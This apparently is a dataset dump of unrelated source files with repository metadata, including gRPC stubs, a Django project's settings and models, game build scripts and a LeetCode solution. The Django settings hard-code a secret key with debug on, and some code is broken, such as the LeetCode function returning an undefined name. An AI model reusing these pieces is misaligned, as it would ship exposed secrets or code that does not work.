raise NotImplementedError("Method not implemented!")
def ListLogEntries(self, request, context):
"""Lists log entries. Use this method to retrieve log entries that originated
from a project/folder/organization/billing account. For ways to export log
entries, see [Exporting Logs](/logging/docs/export).
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListMonitoredResourceDescriptors(self, request, context):
"""Lists the descriptors for monitored resource types used by Logging.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListLogs(self, request, context):
"""Lists the logs in projects, organizations, folders, or billing accounts.
Only logs that have entries are listed.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def add_LoggingServiceV2Servicer_to_server(servicer, server):
rpc_method_handlers = {
"DeleteLog": grpc.unary_unary_rpc_method_handler(
servicer.DeleteLog,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
"WriteLogEntries": grpc.unary_unary_rpc_method_handler(
servicer.WriteLogEntries,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.SerializeToString,
),
"ListLogEntries": grpc.unary_unary_rpc_method_handler(
servicer.ListLogEntries,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.SerializeToString,
),
"ListMonitoredResourceDescriptors": grpc.unary_unary_rpc_method_handler(
servicer.ListMonitoredResourceDescriptors,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.SerializeToString,
),
"ListLogs": grpc.unary_unary_rpc_method_handler(
servicer.ListLogs,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
"google.logging.v2.LoggingServiceV2", rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
|
[
"[email protected]"
] | |
1c191670b95cd97eb7e9927c5966fe0fe092eed3
|
c259bd9e4a570a1fa37949655530d778e5f5c46d
|
/mysite/.history/mysite/settings_20211014220254.py
|
edf1209e555479d4892a4fb712109c1d5b7bea7a
|
[] |
no_license
|
ritikalohia/django-rest-students
|
0cc56f435b7b2af881adfd7cace54eef98213c57
|
ca5f9f466fcd74fef8ce91f019bcb6e7d83c8e20
|
refs/heads/main
| 2023-08-15T21:51:18.988691 | 2021-10-14T18:19:04 | 2021-10-14T18:19:04 | 417,219,011 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,239 |
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-vw0@qaq+af@an^ipzwchu$p*ywufp074e73!dtzcbara-qicvk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"[email protected]"
] | |
f565c7f1049dafaeb6f59a5d1402e33d61f66f26
|
cccf8da8d41ae2c14f5f4313c1edcf03a27956bb
|
/python/python2latex/writeLTXnonfrenchspacing.py
|
500b80bebf55e18223970983e73099ddd5dc5c8a
|
[] |
no_license
|
LucaDiStasio/transpilers
|
e8f8ac4d99be3b42a050148ca8fbc5d025b83290
|
c55d4f5240083ffd512f76cd1d39cff1016909b8
|
refs/heads/master
| 2021-01-12T01:57:00.540331 | 2017-11-01T13:59:55 | 2017-11-01T13:59:55 | 78,448,378 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,438 |
py
|
# Autogenerated with SMOP
from smop.core import *
#
@function
def writeLTXnonfrenchspacing(filepath=None,args=None,options=None,*args,**kwargs):
varargin = writeLTXnonfrenchspacing.varargin
nargin = writeLTXnonfrenchspacing.nargin
##
#==============================================================================
# Copyright (c) 2016-2017 Universite de Lorraine & Lulea tekniska universitet
# Author: Luca Di Stasio <[email protected]>
# <[email protected]>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the distribution
# Neither the name of the Universite de Lorraine or Lulea tekniska universitet
# nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#==============================================================================
# DESCRIPTION
#
# A function to create a Latex file.
# Setting the command untoggles the command\frenchspacingand activates LaTeX standards to insert more space after a period (.) than after an ordinary character.#
##
fileId=fopen(filepath,'a')
fprintf(fileId,'\\n')
line='\\nonfrenchspacing'
if logical_not(strcmp(options,'none')) and logical_not(strcmp(options,'NONE')) and logical_not(strcmp(options,'None')):
line=strcat(line,'[',options,']')
if logical_not(isempty(args)):
line=strcat(line,'{')
for i in arange(1,length(args)).reshape(-1):
dims=size(args)
if dims[1] == 1 and dims[2] == 1:
line=strcat(line,args[i])
else:
if dims[1] > 1 and dims[2] == 1:
try:
line=strcat(line,args[i][1])
finally:
pass
else:
if dims[1] == 1 and dims[2] > 1:
try:
line=strcat(line,args[1][i])
finally:
pass
else:
line=strcat(line,args[i])
line=strcat(line,'}')
fprintf(fileId,strcat(line,'\\n'))
fclose(fileId)
return
|
[
"[email protected]"
] | |
caea2ec58c57adbd5f5dc9e9a63d8dc2b3c96220
|
85d41b34a472a2ec726b6fe9ebccc19a75159641
|
/src/run_interrogate.py
|
c9fd70730d2eb2e009a3c248d42ab3bec617022d
|
[] |
no_license
|
toontownretro/libotp
|
186dacbe920b39a44840cc568cd76f1ea87ebd03
|
1ddfbd6526e88e887468c3c517a5d07dbc6e59be
|
refs/heads/master
| 2022-12-19T10:55:28.239247 | 2020-09-14T00:59:03 | 2020-09-14T00:59:03 | 245,036,965 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,661 |
py
|
import subprocess
import glob
import sys
import os
srcdir = os.path.abspath(os.path.dirname(__file__))
pandadir = os.path.abspath(sys.argv[1])
def run_command(cmd):
p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, shell=True)
ret = p.wait()
if ret != 0:
print("\n")
print('The following command return a non-zero value (%d): %s' % (ret, cmd))
sys.exit(ret)
def interrogate(module):
print('Interrogating', module)
cmd = os.path.join(pandadir, 'bin', 'interrogate')
cmd += ' -D__inline -DCPPPARSER -DP3_INTERROGATE=1 -D__cplusplus -fnames -string -refcount -assert'
cmd += ' -S"%(pandadir)s/include/parser-inc" -S"%(pandadir)s/include" -I"%(pandadir)s/include" -I"%(srcdir)s/movement" -I"%(srcdir)s/nametag"'
cmd += ' -I"%(srcdir)s/otpbase"'
cmd += ' -srcdir "%(srcdir)s/%(module)s"'
cmd += ' -oc "%(srcdir)s/%(module)s_igate.cxx" -od "%(srcdir)s/lib%(module)s.in" -python-native -DCPPPARSER -D__STDC__=1'
cmd += ' -D__cplusplus -D__inline -D_X86_ -DWIN32_VC -DWIN32 -module libotp -library %(module)s -Dvolatile='
cmd = cmd % {'pandadir': pandadir, 'module': module, 'srcdir': srcdir}
files = glob.glob(os.path.join(srcdir, module, '*.h'))
files += glob.glob(os.path.join(srcdir, module, '*.cxx'))
for file in files:
cmd += ' %s' % os.path.basename(file)
run_command(cmd)
for module in ('movement', 'nametag'):
interrogate(module)
os.chdir(srcdir)
cmd = os.path.join(pandadir, 'bin', 'interrogate_module') + ' -python-native -oc libotp_module.cxx'
cmd += ' -library libotp -module libotp libnametag.in libmovement.in'
run_command(cmd)
|
[
"[email protected]"
] | |
9172f47544a3ec96a3b22276472d050776365b40
|
8df5df20ac10a8dc81f7ac6e21e835553a8f5e2d
|
/src/sleekapps/threads/signals/thread/thread.py
|
62045b0ba77e61bb8a378d1da88a8b31a5019dbe
|
[] |
no_license
|
adepeter/sleekforum
|
7be71907d26623c43cd78a6da77a2398c1c25e26
|
35385e648974cdf009732af4c50b69a1825f7fda
|
refs/heads/master
| 2022-09-18T02:45:42.522128 | 2021-10-23T06:41:44 | 2021-10-23T06:41:44 | 208,669,487 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,075 |
py
|
from django.core.cache import cache
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from .models import Thread, ThreadView
# from ..miscs.models.activity import Action
# from ..miscs.signals.activity import activity_updater
# #
# # @receiver(post_save, sender=Action)
# # def like_and_dislike_handler(sender, instance, created, **kwargs):
# # from django.contrib.contenttypes.models import ContentType
# # ct = ContentType.objects.get_for_model(instance).get_object_for_this_type()
# # if created:
# # get_ct_for_obj_of_instance = instance.content_object
# # if instance.action_value == Action.LIKE:
# # get_ct_for_obj_of_instance.likes = ct
# # print('Ading likes counter')
# # else:
# # print('Adding dislike counter')
# # get_ct_for_obj_of_instance.dislikes = ct
# # get_ct_for_obj_of_instance.save()
# #
# #
# # # @receiver(activity_updater)
# # # def hal(sender, **kwargs):
# # # print('Sender is', sender, kwargs.get('obj'))
|
[
"[email protected]"
] | |
47466b53530a7e9c3f7c8c4065f831ce72d30c20
|
12abe02e205d3e8dabe78fb5a93ccca89e2c42c4
|
/tools/prepare_client.py
|
6e73dd03164c3faee99d8c53e13fe17142da37b8
|
[] |
no_license
|
nate97/toontown-src-py3.0
|
55092b2973b76e6b6d566887f44c52822684394c
|
f76c515801ae08c40b264b48365211fd44b137eb
|
refs/heads/master
| 2022-07-07T05:23:22.071185 | 2022-06-22T16:36:10 | 2022-06-22T16:36:10 | 187,682,471 | 15 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,291 |
py
|
#!/usr/bin/env python2
import argparse
import hashlib
import os
from panda3d.core import *
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--distribution', default='en',
help='The distribution string.')
parser.add_argument('--build-dir', default='build',
help='The directory in which to store the build files.')
parser.add_argument('--src-dir', default='..',
help='The directory of the Toontown Infinite source code.')
parser.add_argument('--server-ver', default='toontown-dev',
help='The server version of this build.')
parser.add_argument('--build-mfs', action='store_true',
help='When present, the resource multifiles will be built.')
parser.add_argument('--resources-dir', default='../resources',
help='The directory of the Toontown Infinite resources.')
parser.add_argument('--config-dir', default='../config/release',
help='The directory of the Toontown Infinite configuration files.')
parser.add_argument('--include', '-i', action='append',
help='Explicitly include this file in the build.')
parser.add_argument('--exclude', '-x', action='append',
help='Explicitly exclude this file from the build.')
parser.add_argument('--vfs', action='append',
help='Add this file to the virtual file system at runtime.')
parser.add_argument('modules', nargs='*', default=['otp', 'toontown'],
help='The Toontown Infinite modules to be included in the build.')
args = parser.parse_args()
print('Preparing the client...')
# Create a clean directory to store the build files in:
if os.path.exists(args.build_dir):
shutil.rmtree(args.build_dir)
os.mkdir(args.build_dir)
print('Build directory = ' + args.build_dir)
# Copy the provided Toontown Infinite modules:
def minify(f):
"""
Returns the "minified" file data with removed __debug__ code blocks.
"""
data = ''
debugBlock = False # Marks when we're in a __debug__ code block.
elseBlock = False # Marks when we're in an else code block.
# The number of spaces in which the __debug__ condition is indented:
indentLevel = 0
for line in f:
thisIndentLevel = len(line) - len(line.lstrip())
if ('if __debug__:' not in line) and (not debugBlock):
data += line
continue
elif 'if __debug__:' in line:
debugBlock = True
indentLevel = thisIndentLevel
continue
if thisIndentLevel <= indentLevel:
if 'else' in line:
elseBlock = True
continue
if 'elif' in line:
line = line[:thisIndentLevel] + line[thisIndentLevel+2:]
data += line
debugBlock = False
elseBlock = False
indentLevel = 0
continue
if elseBlock:
data += line[4:]
return data
for module in args.modules:
print('Writing module...', module)
for root, folders, files in os.walk(os.path.join(args.src_dir, module)):
outputDir = root.replace(args.src_dir, args.build_dir)
if not os.path.exists(outputDir):
os.mkdir(outputDir)
for filename in files:
if filename not in args.include:
if not filename.endswith('.py'):
continue
if filename.endswith('UD.py'):
continue
if filename.endswith('AI.py'):
continue
if filename in args.exclude:
continue
with open(os.path.join(root, filename), 'r') as f:
data = minify(f)
with open(os.path.join(outputDir, filename), 'w') as f:
f.write(data)
# Let's write game_data.py now. game_data.py is a compile-time generated
# collection of data that will be used by the game at runtime. It contains the
# PRC file data, and (stripped) DC file:
# First, we need to add the configuration pages:
configData = []
with open('../config/general.prc') as f:
configData.append(f.read())
configFileName = args.distribution + '.prc'
configFilePath = os.path.join(args.config_dir, configFileName)
print('Using configuration file: ' + configFilePath)
with open(configFilePath) as f:
data = f.readlines()
# Replace server-version definitions with the desired server version:
for i, line in enumerate(data):
if 'server-version' in line:
data[i] = 'server-version ' + args.server_ver
# Add our virtual file system data:
data.append('\n# Virtual file system...\nmodel-path /\n')
for filepath in args.vfs:
data.append('vfs-mount %s /\n' % filepath)
configData.append('\n'.join(data))
# Next, we need the DC file:
dcData = ''
filepath = os.path.join(args.src_dir, 'astron/dclass')
for filename in os.listdir(filepath):
if filename.endswith('.dc'):
fullpath = str(Filename.fromOsSpecific(os.path.join(filepath, filename)))
print('Reading %s...' % fullpath)
with open(fullpath, 'r') as f:
data = f.read()
for line in data.split('\n'):
if 'import' in line:
data = data.replace(line + '\n', '')
dcData += data
# Finally, write our data to game_data.py:
print('Writing game_data.py...')
gameData = 'CONFIG = %r\nDC = %r\n'
with open(os.path.join(args.build_dir, 'game_data.py'), 'wb') as f:
f.write(gameData % (configData, dcData.strip()))
# We have all of the code gathered together. Let's create the multifiles now:
if args.build_mfs:
print('Building multifiles...')
dest = os.path.join(args.build_dir, 'resources')
if not os.path.exists(dest):
os.mkdir(dest)
dest = os.path.realpath(dest)
os.chdir(args.resources_dir)
for phase in os.listdir('.'):
if not phase.startswith('phase_'):
continue
if not os.path.isdir(phase):
continue
filename = phase + '.mf'
print('Writing...', filename)
filepath = os.path.join(dest, filename)
os.system('multify -c -f "%s" "%s"' % (filepath, phase))
print('Done preparing the client.')
|
[
"[email protected]"
] | |
d2aa6ff19836d34ff0dab5a45d47cf65bd7f3324
|
02802ecfff8639edc093068da740ded8ee8228aa
|
/test/test_inline_object8.py
|
4de4d72fa7c421eec5426415f92be8159709b6ab
|
[] |
no_license
|
mintproject/data-catalog-client
|
0fc406c2063864144a9a995e98724144b43feb66
|
22afd6341e5f66594c88134834d58e4136e4983a
|
refs/heads/master
| 2020-12-08T21:56:02.785671 | 2020-05-13T03:53:51 | 2020-05-13T03:53:51 | 233,105,679 | 1 | 1 | null | 2020-05-13T03:53:53 | 2020-01-10T18:17:55 |
Python
|
UTF-8
|
Python
| false | false | 873 |
py
|
# coding: utf-8
"""
MINT Data Catalog
API Documentation for MINT Data Catalog # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datacatalog
from datacatalog.models.inline_object8 import InlineObject8 # noqa: E501
from datacatalog.rest import ApiException
class TestInlineObject8(unittest.TestCase):
"""InlineObject8 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineObject8(self):
"""Test InlineObject8"""
# FIXME: construct object with mandatory attributes with example values
# model = datacatalog.models.inline_object8.InlineObject8() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
c8e9a6df4de37b414ea033965c80120dab0b6e57
|
d36975caedab71aaaac26156105afaf59448e445
|
/机器人传感系统/2.超声波距离传感器/读取距离数据_RestfulAPI.py
|
00db909c44b8986e49e69f50e5f9072b82fad478
|
[
"MIT"
] |
permissive
|
mukgong/AI-robot
|
3d84b444ac8d1a0cdb061eda19bb9319c9af036e
|
f89d91b67705878d9e87ae09a35b436495b66707
|
refs/heads/master
| 2022-12-25T01:07:37.174852 | 2020-10-05T01:44:50 | 2020-10-05T01:44:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 500 |
py
|
import requests
import json
def get_sensor():
sensor_url = "http://127.0.0.1:9090/v1/sensors/ultrasonic"
headers={'Content-Type':'application/json'}
response=requests.get(url=sensor_url, headers=headers)
print (response.content)
res = json.loads(response.content)
if (len(res["data"])>0):
print ("ultrasonic id = %d : value = %d "%(res["data"]["ultrasonic"][0]["id"],res["data"]["ultrasonic"][0]["value"]))
if __name__ == '__main__':
get_sensor()
|
[
"[email protected]"
] | |
4e18bb629d0cf47b38d4f4e6bcbfd8840cd16497
|
84abce44bd0278fa99e9556168290675f399834c
|
/EcalAlCaRecoProducers/config/reRecoTags/pulseShapeStudy_m100.py
|
1130a38c27fbf75c327984fb96b19892b85b5ca7
|
[] |
no_license
|
ECALELFS/ECALELF
|
7c304c6b544b0f22a4b62cf942f47fa8b58abef0
|
62a046cdf59badfcb6281a72923a0f38fd55e183
|
refs/heads/master
| 2021-01-23T13:36:31.574985 | 2017-06-22T12:26:28 | 2017-06-22T12:26:28 | 10,385,620 | 1 | 9 | null | 2017-06-30T12:59:05 | 2013-05-30T15:18:55 |
C++
|
UTF-8
|
Python
| false | false | 2,240 |
py
|
import FWCore.ParameterSet.Config as cms
from CondCore.DBCommon.CondDBSetup_cfi import *
RerecoGlobalTag = cms.ESSource("PoolDBESSource",
CondDBSetup,
connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string('74X_dataRun2_Prompt_v2'),
toGet = cms.VPSet(
cms.PSet(record = cms.string("EcalIntercalibConstantsRcd"),
tag = cms.string("EcalIntercalibConstants_2012ABCD_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_ECAL"),
),
cms.PSet(record = cms.string("EcalPulseShapesRcd"),
tag = cms.string("EcalPulseShapes_data"),
connect = cms.untracked.string("sqlite_file:/afs/cern.ch/cms/CAF/CMSALCA/ALCA_ECALCALIB/pulseShapes/ecaltemplates_popcon_timeShifted_-1p000000ns.db"),
),
cms.PSet(record = cms.string("EBAlignmentRcd"),
tag = cms.string("EBAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("EEAlignmentRcd"),
tag = cms.string("EEAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("ESAlignmentRcd"), # only Bon!
tag = cms.string("ESAlignment_measured_v08_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
)
)
|
[
"[email protected]"
] | |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527
|
d78989a8ce52a98f48d77228c4ea893f7aae31f7
|
/symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py
|
80503fc33404de03c7ff542b5ba14a32feb2dee4
|
[] |
no_license
|
llyuer/Tigress_protection
|
78ead2cf9979a7b3287175cd812833167d520244
|
77c68c4c949340158b855561726071cfdd82545f
|
refs/heads/master
| 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null |
UTF-8
|
Python
| false | false | 1,086 |
py
|
#!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
print ref_853999 & 0xffffffffffffffff
|
[
"[email protected]"
] | |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0
|
4b46bcb9e3883a57f46d490da424e8d9463ba8aa
|
/PyFolder/Python_Django/app_integration/apps/appintegrate/models.py
|
9f694e3217e40b8ecf4af783c0155140d3aaa317
|
[] |
no_license
|
LAdkins81/DojoAssignments
|
1752c131454dc6f259d4e84390af218e1a423b50
|
7bc7a92bed72ff37c5d8991e478ffae8fefd82db
|
refs/heads/master
| 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 905 |
py
|
from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
def addUserToCourse(self, object):
user_id = object['users']
user = User.objects.get(id=user_id)
course_id = object['courses']
course = Course.objects.get(id=course_id)
UserCourse.objects.create(user_id=user, course_id=course)
return {'success' : 'User added to course'}
class UserCourse(models.Model):
user_id = models.ForeignKey(User, null=True, related_name="reg_users")
course_id = models.ForeignKey(Course, related_name="reg_courses")
created_at = models.DateTimeField(auto_now_add=True, null=True)
updated_at = models.DateTimeField(auto_now=True)
objects = UserCourseManager()
|
[
"[email protected]"
] | |
57968c4b0079829bed20ff53911d5d768715b9fd
|
7798c5171e4f63b40e9a2d9ae16f4e0f60855885
|
/manage.py
|
b3a505230aac16ae6ce9859ed552d3f4d09d2d80
|
[] |
no_license
|
mstepniowski/wffplanner
|
d2d5ddd2938bd2b7b294332dad0d24fa63c2700a
|
62d1d00ca9a546b759e5c394c7a9da06484a7aa3
|
refs/heads/master
| 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
945d9d0dbf297f3e00334a032fd8cd7922a9654e
|
6cd87462fd9b5ee575aee281f6d2e4be5391ea92
|
/apps/twitter/admin.py
|
f4524da329c2671ab002a1df4a319053a229dfa3
|
[] |
no_license
|
mo-mughrabi/djsocial
|
912413574fd7ce943387dbd5744f05ec8ca57f48
|
060c0a8e0db848879dfaeb4c6f44f1dba7a39aea
|
refs/heads/master
| 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')
# Now register the new TwitterAdmin...
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
list_display = ('user', 'label', 'status','created_at', 'last_run')
admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')
admin.site.register(Order, OrderAdmin)
|
[
"="
] |
=
|
4a2d4fecf255307e71b25519413f146f1bdacfd9
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py
|
053496e29b0e65f9a467defbd48dcafc83eb967e
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,279 |
py
|
"""
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if len(s) == 0: return True
curS, curT= 0, 0
while curT <= len(t) - 1:
if s[curS] == t[curT]:
curS+=1
if curS == len(s):
return True
curT+=1
return curS == l
s = Solution()
print(s.isSubsequence("abc","ahbgdc"))
|
[
"[email protected]"
] | |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5
|
1bdf38834c22b0100595cb22f2862fd1ba0bc1e7
|
/code308RangeSumQuery2DMutable.py
|
f914f056042314c3f89d84a5b8ddf3bfe388b092
|
[] |
no_license
|
cybelewang/leetcode-python
|
48d91c728856ff577f1ccba5a5340485414d6c6e
|
635af6e22aa8eef8e7920a585d43a45a891a8157
|
refs/heads/master
| 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null |
UTF-8
